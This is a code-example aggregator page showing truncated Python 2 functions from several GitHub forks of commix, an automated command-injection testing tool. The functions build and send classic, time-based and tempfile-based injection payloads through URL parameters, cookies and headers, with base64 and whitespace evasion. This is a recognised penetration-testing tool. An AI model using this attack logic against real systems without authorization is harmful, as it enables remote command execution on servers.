          payload = parameters.prefixes(payload, prefix)
          payload = parameters.suffixes(payload, suffix)

          # Check if defined "--verbose" option.
          if menu.options.verbose:
            print Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL

          # Cookie Injection
          if settings.COOKIE_INJECTION == True:
            # Check if target host is vulnerable to cookie injection.
            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
            response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
          else:
            # Check if target host is vulnerable.
            response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

          # Find the directory.
          path = url
          path_parts = path.split('/')
          count = 0
          for part in path_parts:        
            count = count + 1
          count = count - 1
          last_param = path_parts[count]
          output = url.replace(last_param, OUTPUT_TEXTFILE)
          time.sleep(delay)
          
          try:
            # Check if defined extra headers.
            request = urllib2.Request(output)
            headers.do_check(request)
            
            # Evaluate test results.
            output = urllib2.urlopen(request)
            html_data = output.read()
#.........这里部分代码省略.........
开发者ID:evilrovot,项目名称:commix,代码行数:101,代码来源:fb_handler.py

示例11: do_check

def do_check(url, filename):

  classic_state = False
  eval_based_state = False
  time_based_state = False
  file_based_state = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Check if authentication is needed.
  if menu.options.auth_url and menu.options.auth_data:
    # Do the authentication process.
    authentication.authentication_process()
    # Check if authentication page is the same with the next (injection) URL
    if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
      print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
      sys.exit(0)
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
    sys.exit(0)
  else:
    pass

  # Check if HTTP Method is GET or POST.
  header_name = ""
  if not menu.options.data:
    http_request_method = "GET"
    if not settings.COOKIE_INJECTION \
    and not settings.USER_AGENT_INJECTION \
    and not settings.REFERER_INJECTION:
      url = parameters.do_GET_check(url)
    check_parameter = parameters.vuln_GET_param(url)
    the_type = " parameter "

  else:
    http_request_method = "POST"
    parameter = menu.options.data
    parameter = parameters.do_POST_check(parameter)
    check_parameter = parameters.vuln_POST_param(parameter, url)
    the_type = " parameter " 
  
  # Load modules
  modules_handler.load_modules(url, http_request_method, filename)

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    header_name = " Cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = parameters.specify_cookie_parameter(menu.options.cookie)
    the_type = " HTTP header "
            
  # User-Agent Injection
  elif settings.USER_AGENT_INJECTION == True:
    header_name = " User-Agent"
    settings.HTTP_HEADER = header_name[1:].replace("-","").lower()
    check_parameter  = ""
    the_type = " HTTP header "

  # Referer Injection
  elif settings.REFERER_INJECTION == True:
    header_name = " Referer"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = ""
    the_type = " HTTP header "

  if len(check_parameter) > 0:
    settings.TESTABLE_PARAMETER = check_parameter

  # Check for session file 
  if not menu.options.ignore_session:
    if os.path.isfile(settings.SESSION_FILE):
      if not menu.options.tech:
          menu.options.tech = session_handler.applied_techniques(url, http_request_method)
      if session_handler.check_stored_parameter(url, http_request_method):
        settings.LOAD_SESSION = True
        
  if menu.options.flush_session:
    session_handler.flush(url)

  if len(check_parameter) != 0 :
    check_parameter = " '" + check_parameter + "'"

  print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)

  # Check if it is vulnerable to classic command injection technique.
  if not menu.options.tech or "c" in menu.options.tech:
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True
  else:
    classic_state = False

  # Check if it is vulnerable to eval-based code injection technique.
  if not menu.options.tech or "e" in menu.options.tech:
#.........这里部分代码省略.........
开发者ID:jbrahy,项目名称:commix,代码行数:101,代码来源:controller.py

示例12: tb_injection_handler

def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False

  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:
            
            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                if len(TAG) == output_length :
                  if fixation == True:
                    delay = delay + 1
                else:
                  fixation = True
                  continue

                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2
                cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
                output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
                
                if str(output) == str(randvcalc):
                  if not menu.options.verbose:
#.........这里部分代码省略.........
开发者ID:yd0str,项目名称:commix,代码行数:101,代码来源:tb_handler.py

示例13: fb_injection_handler


#.........这里部分代码省略.........
            OUTPUT_TEXTFILE = TAG + ".txt"    
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            try:
              # File-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
              else:
                payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                      
              # Check if defined "--prefix" option.
              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)

              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)

              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)          

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer injection.
                vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
                response = fb_injector.referer_injection_test(url, vuln_parameter, payload)

              # Custom HTTP header Injection
              elif settings.CUSTOM_HEADER_INJECTION == True:
                # Check if target host is vulnerable to custom http header injection.
                vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG)
                response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload)

              else:
                # Check if target host is vulnerable.
                response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

              # Find the directory.
              output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
              time.sleep(delay)
              
              try:
                # Check if defined extra headers.
                request = urllib2.Request(output)
                headers.do_check(request)
开发者ID:brianwrf,项目名称:commix,代码行数:67,代码来源:fb_handler.py

示例14: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  is_vulnerable = False
  export_injection_info = False
  how_long = 0
  injection_type = "Semiblind Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        # Change TAG on every request to prevent false-positive resutls.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
        alter_shell = menu.options.alter_shell
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:

            # Log previous 'how_long' for later comparison
            previous_how_long = how_long

            # Tempfile-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
            else:
              payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            # Encode payload to Base64
            if menu.options.base64:
              payload = base64.b64encode(payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
                
            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
              
            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if how_long == previous_how_long + delay:
                # Time relative false positive fixation.
#.........这里部分代码省略.........
开发者ID:tdr130,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例15: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):

  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  possibly_vulnerable = False
  false_positive_warning = False
  how_long_statistic = []
  export_injection_info = False
  how_long = 0
  injection_type = "semi-blind command injection"
  technique = "tempfile-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    err_msg = "The '--url-reload' option is not available in " + technique + "!"
    print settings.print_critical_msg(err_msg)

  whitespace = checks.check_whitespaces()

  if settings.VERBOSITY_LEVEL >= 1:
    info_msg ="Testing the " + technique + "... "
    print settings.print_info_msg(info_msg)

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:

        if settings.LOAD_SESSION:
          cmd = shell = ""
          url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
          checks.check_for_stored_tamper(payload)
          settings.FOUND_HOW_LONG = how_long
          settings.FOUND_DIFF = how_long - delay
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          
        else:
          num_of_chars = num_of_chars + 1
          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive resutls.
          TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

          # The output file for file-based injection technique.
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          alter_shell = menu.options.alter_shell
          tag_length = len(TAG) + 4
          
          for output_length in range(1, int(tag_length)):
            try:
              # Tempfile-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
              else:
                payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)
              
              # Encode payload to Base64
              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)
                  
              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer injection.
#.........这里部分代码省略.........
开发者ID:dtrip,项目名称:commix,代码行数:101,代码来源:tfb_handler.py


注:本文中的src.core.requests.parameters.specify_cookie_parameter函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。